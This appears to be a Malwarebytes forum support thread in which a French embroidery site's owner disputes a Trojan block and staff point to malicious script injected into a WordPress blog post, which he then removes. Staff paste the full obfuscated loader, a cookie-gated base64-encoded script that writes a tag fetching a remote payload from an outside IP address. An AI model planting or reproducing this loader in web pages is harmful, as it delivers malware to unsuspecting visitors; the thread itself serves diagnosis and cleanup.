Blocked website because of (unspecified) Trojan

[BenoitCHOPLIN]

Helo,

Our website seems to be wrongly blocked by your realtime website scan engine, despite a clean report on virustotal  and with immunifyAV on our hosted server, as well as various online website scanning tools. Blocking is not immediate and happens after about 1 hour  of surfing. It was reported by one customer (only, so far) and we managed to reproduce it on our own computers.

Here is the information :

URL : https://www.creatricesbroderiemachine.com/

Server IP : 85.236.155.161

Malwarebytes Screenshots attached as well as report

mb.txt

[Dashke]

Please check your website for a suspicious code -

<p>  <!--codes_iframe--><script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script><script src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs="></script><script src="./3 façons créatives d’utiliser des restes de tissu et broder durablement – Le mag CBM_files/5cw2fk"></script> <!--/codes_iframe--></p>

 

[BenoitCHOPLIN]

I'm sorry, but I can't find this one. Any more details please ?

[Dashke]

Please check this link for example -

creatricesbroderiemachine.com/blog/2017/05/06/3-facons-creatives-dutiliser-des-restes-de-tissu-et-broder-durablement

 

[BenoitCHOPLIN]

OK, found it too at the same time. This is from ou wordpress associated blog, not from the main website itself, which explains why we didn't find anything.

Thanks pointing at this so quickly.

As soon as I fix it, what's next regarding  MB flagging ?

[Dashke]

When you remove the malicious script, please let me know in this threat and I will remove the block after inspecting the website.

[BenoitCHOPLIN]

OK. I cleaned  up all the posts with the malicious code and checked all potential other locations. Everything should be fine now.

BTW : do you have any idea of what this code was actually doing ?

[Dashke]

9 minutes ago, BenoitCHOPLIN said:

OK. I cleaned  up all the posts with the malicious code and checked all potential other locations. Everything should be fine now.

BTW : do you have any idea of what this code was actually doing ?

It would pull a file from

http://185.156.177.85/5cw2fk

on customer's computer. Thanks, the block will be removed soon.

[BenoitCHOPLIN]

Thank you very much !

[Dashke]

7 minutes ago, BenoitCHOPLIN said:

Thank you very much !

You are always welcome!

The block has been removed from the next update. Wish you a great day!